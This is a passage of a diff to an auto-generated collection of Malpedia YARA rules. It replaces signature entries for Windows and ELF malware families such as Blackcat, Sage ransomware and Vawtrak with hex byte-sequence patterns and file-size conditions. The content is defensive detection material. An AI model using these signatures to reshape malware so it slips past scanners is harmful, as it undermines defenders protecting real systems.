+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.doorme_auto.yar#L1-L129"
 		license_url = "N/A"
-		logic_hash = "1a2f2499fd9c35d46eb281cf2189d5af496ab41ea2f40681381bfb3d9321a241"
+		logic_hash = "9459417024dba9c22cb08f7485ab12bc8f994d94a97e4b89e9d80101a9a838df"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -101351,32 +101537,32 @@ rule MALPEDIA_Win_Rustonotto_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 4889fa 84c0 0f84befdffff 488b0d???????? 488b4138 4885c0 }
-		$sequence_1 = { e8???????? 4983c4f9 488d8528010000 0f1f4000 4c8b30 450fb7aed2030000 498d742401 }
-		$sequence_2 = { eb02 31c0 66897d08 6689750a 488945f8 488d05a4751800 48894500 }
-		$sequence_3 = { eb0f b908000000 ba18000000 e8???????? 0f0b 90 4889542410 }
-		$sequence_4 = { 84c0 0f85d8feffff c6470101 e9???????? c685c700000000 e8???????? 84c0 }
-		$sequence_5 = { 740f 488d4d60 488b5550 4c8b4558 ff5020 90 4883c430 }
-		$sequence_6 = { e8???????? 0fb64520 3c03 751f 4183bf1801000001 0f858d000000 66c7060305 }
-		$sequence_7 = { e8???????? 8b8580040000 83f802 7432 83f803 0f84ba1d0000 a801 }
-		$sequence_8 = { 747b 8b514c 448b8990000000 4101d1 b801000000 7058 0f88f4010000 }
-		$sequence_9 = { c6858f04000001 c6858e04000000 8b8578040000 88858d040000 c6858c04000001 c6858b04000001 488d0d2f2a1000 }
+		$sequence_0 = { 817d0063736de0 7528 48833d????????00 741e 488d0d70e50100 e8???????? 85c0 }
+		$sequence_1 = { 488bd8 488d9530010000 4883bd4801000010 480f439530010000 498b07 4c8d85e8000000 }
+		$sequence_2 = { 483bf8 7730 488d041f 48894548 488d4538 4983fe10 480f434538 }
+		$sequence_3 = { e8???????? 49897f10 49c747180f000000 41c60700 498b5618 4883fa10 0f82adfeffff }
+		$sequence_4 = { 4532d1 44881408 418d4001 440fb60c08 8d4705 4432cd }
+		$sequence_5 = { 488bd8 4885db 488d0571b80100 488d4f58 480f44d8 488bd3 488b5c2430 }
+		$sequence_6 = { 48c7c03f000000 23c1 488d0d4abb0100 f20f5904c1 f20f5804c1 660f72e406 660f73f434 }
+		$sequence_7 = { e8???????? 488b5c2430 4883c420 5f c3 4883ec28 4c8d0d0d660100 }
+		$sequence_8 = { 488d0538030300 49894408f0 488b07 4c634004 }
+		$sequence_9 = { 48894308 48895e40 48897e48 48896e50 488bce e8???????? 884658 }
 
 	condition:
-		7 of them and filesize < 5989376
+		7 of them and filesize < 580608
 }
-rule MALPEDIA_Win_Blackcat_Auto : FILE
+rule MALPEDIA_Win_Threebyte_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "7d7e215c-b7ec-5d55-a8aa-0595745c47b1"
+		id = "799d81f4-c3a7-51cd-8c7b-153e88acd8dd"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackcat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.blackcat_auto.yar#L1-L117"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.threebyte"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.threebyte_auto.yar#L1-L128"
 		license_url = "N/A"
-		logic_hash = "f613dd0b295abc7ed25049f8912ac5a26d116d8e5b2b8db308f5a3d66d3b2048"
+		logic_hash = "2ca2547a0ff0213816f73a796ceafd61c5b00d7d4af221dfd97f4e43556e0e8c"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -101390,32 +101576,32 @@ rule MALPEDIA_Win_Blackcat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d4701 31c9 31d2 89460c 4f c745f000000000 }
-		$sequence_1 = { 3c02 7351 88c4 8975cc }
-		$sequence_2 = { 8945e8 0f83a1000000 85db 0f8499000000 803c3b5f }
-		$sequence_3 = { 81f902010000 747b e9???????? 8d81d6c3ffff 83f802 726b 81f9ed350000 }
-		$sequence_4 = { 31f6 c70201000000 c7420400000000 894208 c7420c00000000 0fb788d6040000 }
-		$sequence_5 = { c1e203 662e0f1f840000000000 90 85d2 7411 8b39 83c108 }
-		$sequence_6 = { 0f1f840000000000 6690 55 89e5 }
-		$sequence_7 = { 8b450c 89d6 8a10 80c2e6 80fa05 7779 }
-		$sequence_8 = { 80c230 8894056bffffff 48 e9???????? }
-		$sequence_9 = { 83c40c 84c0 0f858b010000 8d4704 }
+		$sequence_0 = { 8b9598fbffff 52 8d859cfbffff 50 8d8d4cf7ffff 51 8d956cf7ffff }
+		$sequence_1 = { 6a20 68cc000000 8d8de0fdffff 51 e8???????? 83c40c }
+		$sequence_2 = { c68531faffff6d c68532faffff65 c68533faffff00 8d8d28faffff 51 8b95a8faffff 52 }
+		$sequence_3 = { 52 8d8544feffff 50 8d8dccfeffff 51 e8???????? }
+		$sequence_4 = { ff15???????? 8d95ccfcffff 52 8d8510f8ffff 50 8d8dd0fdffff 51 }
+		$sequence_5 = { c685b1fdffff00 ff15???????? 50 8d8d94fdffff 51 }
+		$sequence_6 = { 81bda4f7fffff6010000 7507 b8faffffff eb05 b8f9ffffff 5f 8be5 }
+		$sequence_7 = { e8???????? 83c404 e9???????? 6a02 6a00 6a00 8b95d0fdffff }
+		$sequence_8 = { 50 e8???????? 83c408 89853cffffff 83bd3cffffff00 }
+		$sequence_9 = { 3b4d0c 7d15 8b5508 33c0 8a02 8945e0 8b4d08 }
 
 	condition:
-		7 of them and filesize < 29981696
+		7 of them and filesize < 180224
 }
-rule MALPEDIA_Win_Killav_Auto : FILE
+rule MALPEDIA_Win_Mocton_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "964918fc-ee46-54ff-896b-e1283f7b0e40"
+		id = "9f4f983b-9c6b-508d-9490-50b17ee1d0df"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.killav"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.killav_auto.yar#L1-L128"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mocton"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.mocton_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "8efc8b29b31fba331f15fc6d418a70e9cc051d66f52514c3f27af471a4a7b82f"
+		logic_hash = "16b135f602d0bf1d0d71eee14e2cd809b4b69481edc54d1e4a70e6527694874b"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -101429,34 +101615,34 @@ rule MALPEDIA_Win_Killav_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 83c408 6a09 33c0 c745d800000000 68???????? 8d4dd8 }
-		$sequence_1 = { 51 e8???????? 83c408 6a13 33c0 c745d800000000 68???????? }
-		$sequence_2 = { 85c0 0f84b7910000 83f808 7d0f 6bc018 05???????? }
-		$sequence_3 = { eb1a 8b4508 8bc8 83e03f c1f906 6bd038 8b0c8d70ba4300 }
-		$sequence_4 = { 8b0c8d70ba4300 804c112802 5b 2bf7 83e6fe 5f 8bc6 }
-		$sequence_5 = { 895db8 c745dc01000000 8b048570ba4300 8945d4 0f8533010000 8b55d4 8bc3 }
-		$sequence_6 = { 8b0b 8b4904 6a00 ff75dc ff75e8 }
-		$sequence_7 = { 0fb74d08 33c0 663b88bcf34200 740d 83c002 83f814 }
-		$sequence_8 = { c645fc15 50 8d4dd0 e8???????? c645fc00 }
-		$sequence_9 = { 741c 81f900000400 7542 0c80 88441628 8b04bd70ba4300 c644102901 }
+		$sequence_0 = { 8b4d10 e8???????? 8985e4e8ffff 8b85e4e8ffff 2b45a4 3b45dc 7202 }
+		$sequence_1 = { 83e801 8945d4 8b4dd4 0faf4de8 8b55e4 c1fa05 69d271460389 }
+		$sequence_2 = { 8b9524fcffff 69d2a44539db 33c0 81fa35ac0e36 0f9cc0 355ba30c98 7461 }
+		$sequence_3 = { 2b45e4 33c9 3d6b76f951 0f9dc1 33d1 742c 8b55e4 }
+		$sequence_4 = { 8b95c8e9ffff 83c201 8995c8e9ffff eb4e 8b85c0e9ffff 83e801 8985c0e9ffff }
+		$sequence_5 = { 83c104 894df8 8b55f8 3b55cc 0f8475060000 c745ac5aee3273 8b45ac }
+		$sequence_6 = { c745c842fc81f2 c7459cea0bbd91 c745b0238aa931 8b55c8 c1fa03 0faf55b0 b886628d96 }
+		$sequence_7 = { 898d70feffff 8b9570feffff 81c28029ab41 33c0 399570feffff 0f9dc0 338570feffff }
+		$sequence_8 = { 0355e4 8b45e4 d1f8 33c9 3b45e4 0f9ec1 33ca }
+		$sequence_9 = { 33d2 3b8d8cfdffff 0f9cc2 81e2d70a7b03 81f21da6f69d 7419 8b854cfdffff }
 
 	condition:
-		7 of them and filesize < 517120
+		7 of them and filesize < 573440
 }
-rule MALPEDIA_Win_Broomstick_Auto : FILE
+rule MALPEDIA_Win_Skinnyboy_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "1ab4b8f8-6d0d-5d71-8cc9-a6fff05006b5"
+		id = "24a64f43-deef-557c-9fd6-67c28ce40905"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.broomstick"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.broomstick_auto.yar#L1-L284"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.skinnyboy"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.skinnyboy_auto.yar#L1-L127"
 		license_url = "N/A"
-		logic_hash = "0c1a3ef9abdd4d0302256ec532496054e8db7eaa8ec35bdd017317b264a8cb67"
+		logic_hash = "e1fe3c77c85dc8fb19abbee4d29db040d7e39adcf95610e368b642b3c9a51b2e"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -101468,53 +101654,32 @@ rule MALPEDIA_Win_Broomstick_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 2bc2 83c002 99 83e203 03c2 }
-		$sequence_1 = { 03f0 56 e8???????? 8b45dc 83c40c c6040600 eb10 }
-		$sequence_2 = { 83c40c c6040600 eb10 c645dc00 ff75dc 51 8d4dc0 }
-		$sequence_3 = { c6400100 8808 eb13 ff75e8 }
-		$sequence_4 = { 51 50 51 8bce e8???????? 8b4dec }
-		$sequence_5 = { 83c408 33c0 c7467000000000 c7467407000000 66894660 }
-		$sequence_6 = { 8b45d4 8b75d0 2bc6 894ddc 51 52 }
-		$sequence_7 = { 80b9????????3f 76f3 2bc2 83c002 }
-		$sequence_8 = { 49898688150400 488d4c2428 ffd5 48b80b8b55f8b9616cd5 }
-		$sequence_9 = { ba01000000 488bcf ff15???????? ba32ac0600 488bcf ff15???????? }
-		$sequence_10 = { 488d4d38 e8???????? 0f57c0 0f114518 }
-		$sequence_11 = { 498986876a0300 4889f1 ba07000000 488b2d???????? }
-		$sequence_12 = { 49898687650300 488d4c2428 41ffd4 4889f1 }
-		$sequence_13 = { 4c2bc1 ba2c000000 e8???????? 488bc8 4885c0 }
-		$sequence_14 = { ba01000000 488bcf ff15???????? ba08000000 488bcf ff15???????? 48b8e01fcd305c98c076 }
-		$sequence_15 = { ba01000000 488bcf ff15???????? ba58000000 488bcf ff15???????? }
-		$sequence_16 = { ba01000000 488bcf ff15???????? ba3a867600 488bcf ff15???????? }
-		$sequence_17 = { ba01000000 488bcf ff15???????? ba0a000000 488bcf ff15???????? }
-		$sequence_18 = { ba01000000 488bcf ff15???????? ba5a000000 488bcf ff15???????? }
-		$sequence_19 = { 498986876b0300 488d4c2428 41ffd7 4d89fc }
-		$sequence_20 = { 49898688160400 b917d46400 41ffd4 4889c7 }
-		$sequence_21 = { 49898688320300 b9bc474300 41ffd4 4889c7 }
-		$sequence_22 = { 0f114540 4c896d50 4c896d58 4533c0 }
-		$sequence_23 = { 4c8d053e920100 488bc2 83e23f 48c1f806 488d0cd2 }
-		$sequence_24 = { ba01000000 488bcf ff15???????? ba31e7ca00 488bcf ff15???????? }
-		$sequence_25 = { 488d056cc10200 488907 488d057ac10200 0f104318 488b5c2430 }
-		$sequence_26 = { ba01000000 488bcf ff15???????? ba6ef90b00 488bcf ff15???????? }
-		$sequence_27 = { 49898688140400 4889f1 4889fa 4c8b3d???????? }
-		$sequence_28 = { 48c7457807000000 0f1006 0f114560 e9???????? }
-		$sequence_29 = { 498986876c0300 4889f9 4c8b3d???????? 41ffd7 }
-		$sequence_30 = { 498bc6 4d8bee 49c1fd06 4c896dc7 488d0d8f3afeff }
+		$sequence_0 = { 85c0 7403 50 ffd7 ffd3 6a00 }
+		$sequence_1 = { 0fb68098b20010 83e00f eb02 33c0 8bbdc4fdffff 6bc009 0fb6bc38b8b20010 }
+		$sequence_2 = { 668b444de4 6631444dd0 41 3bca 72f1 33c0 }
+		$sequence_3 = { 8d8278040110 8945e4 803800 8bc8 7435 8a4101 84c0 }
+		$sequence_4 = { 833cfdd80b011000 7515 68a00f0000 56 ff15???????? }
+		$sequence_5 = { 50 ffd6 8b85e0feffff 85c0 7403 50 }
+		$sequence_6 = { ffb55cfbffff ff15???????? 85c0 0f85d2feffff ffb55cfbffff ff15???????? ff33 }
+		$sequence_7 = { ff15???????? 8bf0 6a01 56 ff15???????? 8d4c2420 51 }
+		$sequence_8 = { 7413 8a8c1564feffff 308c15e4feffff 42 3bd0 72ed }
+		$sequence_9 = { ff15???????? 8d442430 50 ff15???????? 85c0 742d }
 
 	condition:
-		7 of them and filesize < 1567744
+		7 of them and filesize < 176128
 }
-rule MALPEDIA_Win_Mirrorkey_Auto : FILE
+rule MALPEDIA_Win_Sage_Ransom_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "23fdf476-29dd-5c48-a2d0-67c951326855"
+		id = "ee390467-2b1f-5dff-a025-ffcdbd989eda"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mirrorkey"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.mirrorkey_auto.yar#L1-L118"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sage_ransom"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.sage_ransom_auto.yar#L1-L162"
 		license_url = "N/A"
-		logic_hash = "23c2e6c1488c0365d27087d2deccf67b069663ff42f157533379a432751ee152"
+		logic_hash = "f697fb2bbef92176cedab9ef91a434357e32fdc073b94b3d51cf50581ce561f1"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -101528,32 +101693,38 @@ rule MALPEDIA_Win_Mirrorkey_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 56 8d4db8 c745cc0f000000 c745c800000000 c645b800 }
-		$sequence_1 = { 50 68???????? 53 c745a400000000 e8???????? 0fbe4317 8d4da8 }
-		$sequence_2 = { 8b06 eb02 8bc6 c60000 c745fc00000000 8bce a1???????? }
-		$sequence_3 = { 7406 8a740608 eb03 8a76fc 85c0 752f }
-		$sequence_4 = { 88442433 8d7808 0f1f440000 53 }
-		$sequence_5 = { 50 e8???????? ff75fc 8d45fc ff75f8 50 }
-		$sequence_6 = { 8b85f4feffff 33f6 3930 7446 33db }
-		$sequence_7 = { 56 ff15???????? 5f 5e c7430400000000 }
-		$sequence_8 = { 32d3 2503000080 7905 48 }
-		$sequence_9 = { 85c0 7405 8a0c06 eb03 8a4ef4 }
+		$sequence_0 = { 01442410 ff15???????? 8bc8 8b442410 2b4c2438 }
+		$sequence_1 = { 755b 6683780200 7554 6aff ff15???????? 85c0 }
+		$sequence_2 = { c1e910 0fb74c4c18 c1e010 0bc8 8bd1 }
+		$sequence_3 = { 837c241000 750b 837c241400 0f84d8000000 8b442410 be00000200 3bc6 }
+		$sequence_4 = { bbfdffffff 8d4c240c 51 e8???????? 8d54241c 52 }
+		$sequence_5 = { 56 57 6af5 ff15???????? 8b15???????? 83c204 52 }
+		$sequence_6 = { 6a41 56 52 e8???????? 56 }
+		$sequence_7 = { 8bf1 33d2 3bf7 732a 8a06 }
+		$sequence_8 = { 014110 8b4314 014114 8b4318 }
+		$sequence_9 = { 014108 8b430c 01410c 8b4310 }
+		$sequence_10 = { 01410c 8b4310 014110 8b4314 }
+		$sequence_11 = { 891c24 89442404 e8???????? 8d964ba20000 c744240879020000 }
+		$sequence_12 = { 014114 8b4318 014118 8b431c }
+		$sequence_13 = { 013c13 83c102 46 ebd3 }
+		$sequence_14 = { 0101 8b4304 014104 8b4308 014108 }
+		$sequence_15 = { 0119 117104 83c110 83c210 }
 
 	condition:
-		7 of them and filesize < 117760
+		7 of them and filesize < 335872
 }
-rule MALPEDIA_Win_Kagent_Auto : FILE
+rule MALPEDIA_Win_Void_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "eeb554cd-bcde-5191-9d05-cd5d3b643304"
+		id = "941d9913-0086-5f92-b6d2-4c2b84e02b90"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kagent"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.kagent_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.void"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.void_auto.yar#L1-L114"
 		license_url = "N/A"
-		logic_hash = "f0789c212010e4f78374ae02f32c05cce682ad24c1e1d92ee73ca388e2879a4e"
+		logic_hash = "0a42c2ab7a2695a1845afe0b2eb12bba423d7c94d695c9222413c48eaaabdfac"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -101567,71 +101738,69 @@ rule MALPEDIA_Win_Kagent_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83ec0c 56 57 8bf8 8b7744 8b4f18 c745f800000000 }
-		$sequence_1 = { 85c0 7e2b 3bf0 7d51 85f6 784d 8b450c }
-		$sequence_2 = { ff15???????? 57 ffd6 68???????? e8???????? 83c404 53 }
-		$sequence_3 = { 50 8d45f4 64a300000000 8a450c 8b5d10 8955ac 8b5518 }
-		$sequence_4 = { 56 8d75ec e8???????? 8b4804 8b4704 bb01000000 e8???????? }
-		$sequence_5 = { ffd6 668b542410 663b542420 74ed ff15???????? 33d2 b9e8030000 }
-		$sequence_6 = { 8b4004 33f6 83c40c 897220 897224 8b5580 52 }
-		$sequence_7 = { 56 8bf0 57 3b7508 745a 8d542410 33c9 }
-		$sequence_8 = { e8???????? c7459c09000000 895de8 8d8d6cffffff 51 57 c645fc05 }
-		$sequence_9 = { 50 68???????? 68???????? e8???????? 83c40c eb24 }
+		$sequence_0 = { 83e001 0f840c000000 8365ecfe 8d4db8 e9???????? c3 8d8dd4feffff }
+		$sequence_1 = { 8b4564 83e004 0f840c000000 836564fb 8d4dac e9???????? c3 }
+		$sequence_2 = { 6a02 8d4d48 e8???????? 8d4548 c745fc02000000 bb01000000 8bce }
+		$sequence_3 = { 7504 c645f301 8d4db8 c745fcffffffff e8???????? 807df300 0f8569060000 }
+		$sequence_4 = { 83e914 e9???????? 83e918 e9???????? 83e93c e9???????? 83e904 }
+		$sequence_5 = { 50 8d4dd8 e8???????? 8d45d8 8d732c 50 8bce }
+		$sequence_6 = { 50 8bcf e8???????? 8d8d64ffffff c645fc0c e8???????? 33f6 }
+		$sequence_7 = { 0f8510010000 8b85b8feffff 66c745840100 889d71ffffff c78578ffffff00000000 8b4004 8b8c05f0feffff }
 
 	condition:
-		7 of them and filesize < 4972544
+		7 of them and filesize < 2744320
 }
-rule MALPEDIA_Win_Unidentified_082_Auto : FILE
+rule MALPEDIA_Win_Agfspy_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "7772581c-e8cf-5615-a758-46ef9c1fc0b0"
-		date = "2021-10-07"
-		modified = "2021-10-08"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_082"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.unidentified_082_auto.yar#L1-L124"
+		id = "4e342af2-55f5-5fdc-91a0-c4e1164ec1ad"
+		date = "2026-01-05"
+		modified = "2026-01-06"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.agfspy"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.agfspy_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "fdfe1ddce9f77ac8b465b0ddebe868c5e77078cf2b2457573a5b3810682f45ee"
+		logic_hash = "2c968cb953938166f8c4bb13e44158b837061eedd931abcb024c0888547d30a4"
 		score = 75
 		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
 		signator_config = "callsandjumps;datarefs;binvalue"
-		malpedia_rule_date = "20211007"
-		malpedia_hash = "e5b790e0f888f252d49063a1251ca60ec2832535"
-		malpedia_version = "20211008"
+		malpedia_rule_date = "20260105"
+		malpedia_hash = "19b79e7cab4eaf532122e5b45a77dd8f6bb5cc79"
+		malpedia_version = "20251219"
 		malpedia_license = "CC BY-SA 4.0"
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 4c8d0dbc190200 0f1f4000 0f1f840000000000 418d4801 }
-		$sequence_1 = { ff5018 4c634510 488d0df40a0200 488bd8 33c0 }
-		$sequence_2 = { 4c634510 488d0d93fa0100 488bd8 33c0 488bd3 488905???????? 488905???????? }
-		$sequence_3 = { ff15???????? 488b0cdf ff15???????? 48c704dfffffffff }
-		$sequence_4 = { 4885c0 0f84ac010000 48833d????????00 0f849e010000 48833d????????00 0f8490010000 48833d????????00 }
-		$sequence_5 = { 488b0d???????? 8b5108 488b4910 4533c9 458d4130 4c89742420 }
-		$sequence_6 = { 33c0 e9???????? 8a07 4c8b7c2448 4c8d25a64c0100 4b8b0cfc ffc3 }
-		$sequence_7 = { 0f1f4000 0f1f840000000000 418d4801 0fb6c2 41ffc0 f7da }
-		$sequence_8 = { 488b4f18 4c8d4d10 488b01 488d1587000200 41b810000000 ff5018 4c634510 }
-		$sequence_9 = { 48894598 eb03 4533f6 488b05???????? 80782e00 740a 80782000 }
+		$sequence_0 = { 8901 8b0b 85c9 7405 8b01 ff5010 8933 }
+		$sequence_1 = { 8bc6 8b4d0c 890e 8b4d10 5f 894e04 5e }
+		$sequence_2 = { c744c81000000000 8d2cc8 8b4c241c c7451400000000 0f1001 0f114500 f30f7e4110 }
+		$sequence_3 = { 8bc8 6a01 ff12 8d4d98 e8???????? 0f57c0 c745e800000000 }
+		$sequence_4 = { b801000000 eb40 83ec08 c6462401 50 e8???????? 8945d0 }
+		$sequence_5 = { 5e 5b 8be5 5d c20400 8b470c 33f6 }
+		$sequence_6 = { 3c0a 7409 6a0a 8bce e8???????? 837f3c10 8d4728 }
+		$sequence_7 = { b001 c6460401 e9???????? 8b01 ff5018 83f8ff 7405 }
+		$sequence_8 = { e8???????? 0fb7ff eb16 0fb77c2410 8d4c2414 e8???????? 0fb7ff }
+		$sequence_9 = { 8bcf e8???????? 8bc8 e8???????? 8bc8 e8???????? 83ec18 }
 
 	condition:
-		7 of them and filesize < 414720
+		7 of them and filesize < 1482752
 }
-rule MALPEDIA_Win_Warlock_Auto : FILE
+rule MALPEDIA_Elf_Persirai_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "5e6c43cf-6cf3-5e2a-a16b-cb7d8e2e37a1"
+		id = "71dd969e-17c7-51f6-8baa-f5813c4b7618"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.warlock"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.warlock_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/elf.persirai"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/elf.persirai_auto.yar#L1-L129"
 		license_url = "N/A"
-		logic_hash = "39dc3d0e9802161f2f6843f6a22ec4febcc1ed616080a524da3e5c547a9f1dac"
+		logic_hash = "8b3f4b08e462bfefa6597fd60f192d2977efdf6597eab8ae390529732ac3b197"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -101645,34 +101814,34 @@ rule MALPEDIA_Win_Warlock_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b95c0f6ffff f724ba 0385ccf6ffff 83d200 01841dc0f8ffff 8b9de0f6ffff 8b85bcf8ffff }
-		$sequence_1 = { 894c2420 c16c242008 331cc574e44900 0fb6c1 8b4c2410 0fb6c9 8b04c571e44900 }
-		$sequence_2 = { 03c2 8bd0 c1e81a 2b442448 81e2ffffff03 89542430 89542444 }
-		$sequence_3 = { c70000000000 c7400800000000 c9 c20400 56 8bf1 8b8e80000000 }
-		$sequence_4 = { 6a34 e8???????? 8945e8 59 85c0 740d 57 }
-		$sequence_5 = { 50 8d4de8 c745fc04000000 e8???????? eb0a 6a01 8d4de8 }
-		$sequence_6 = { 80fb35 7e82 33c0 84db 0f95c0 05feff0000 e9???????? }
-		$sequence_7 = { 8b94249c000000 81c2feffff07 03c2 8bd0 c1e81a 81e2ffffff03 2b442458 }
-		$sequence_8 = { 0f94c1 2500180000 2d00100000 f7d8 1bc0 40 f7c300800000 }
-		$sequence_9 = { 668b4306 663b45e4 7513 c6062d 8d7e01 8bcb 89bd70ffffff }
+		$sequence_0 = { 8d680c 8b400c 83e0fe 85c0 75e6 }
+		$sequence_1 = { 51 e8???????? 8d5c2424 89f1 89df 89e8 fc }
+		$sequence_2 = { 7423 0fbed0 a1???????? 8854243b 85c0 0f84f9000000 8810 }
+		$sequence_3 = { 52 8b5020 53 50 ff5208 83c410 }
+		$sequence_4 = { 6648 759f 53 53 57 8d44244c 50 }
+		$sequence_5 = { 56 53 83ec0c 89c7 be???????? }
+		$sequence_6 = { 89d0 5a 59 5b c3 8b442404 8b542408 }
+		$sequence_7 = { eb0c 89c2 8b02 39c1 75f8 8b01 8902 }
+		$sequence_8 = { e8???????? 89c3 8bb098000000 85f6 751c 50 50 }
+		$sequence_9 = { 84c0 742a 8d7600 46 3c25 742b 0fbed0 }
 
 	condition:
-		7 of them and filesize < 1395712
+		7 of them and filesize < 229376
 }
-rule MALPEDIA_Win_Remsec_Strider_Auto : FILE
+rule MALPEDIA_Win_Vawtrak_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "db849346-fdc8-5458-b09f-0ed961302034"
+		id = "ce9fb6b0-3a67-57cc-b4c0-309ef9ca9f22"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.remsec_strider"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.remsec_strider_auto.yar#L1-L132"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.vawtrak"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.vawtrak_auto.yar#L1-L207"
 		license_url = "N/A"
-		logic_hash = "c3432e8fc924d7004cd90cb89b83a8a788a294cbc5555d3841fb9abcee97c26b"
+		logic_hash = "0909b4692ca0a0193737f7d7a0d93f3e3c94141796cfc88c3ca14d523aa0a3d1"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -101684,32 +101853,44 @@ rule MALPEDIA_Win_Remsec_Strider_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? c700???????? c74024282d8000 897828 8b481c c7412003000000 89782c }
-		$sequence_1 = { e8???????? 8bc8 6a01 8bc3 e8???????? 83c40c 83c8ff }
-		$sequence_2 = { 2345fc d3e8 0fb74de2 03c1 8b4e4c 8b0481 8bc8 }
-		$sequence_3 = { 6a04 59 83460810 8b55f4 0fb75a02 8b4608 0fb7d3 }
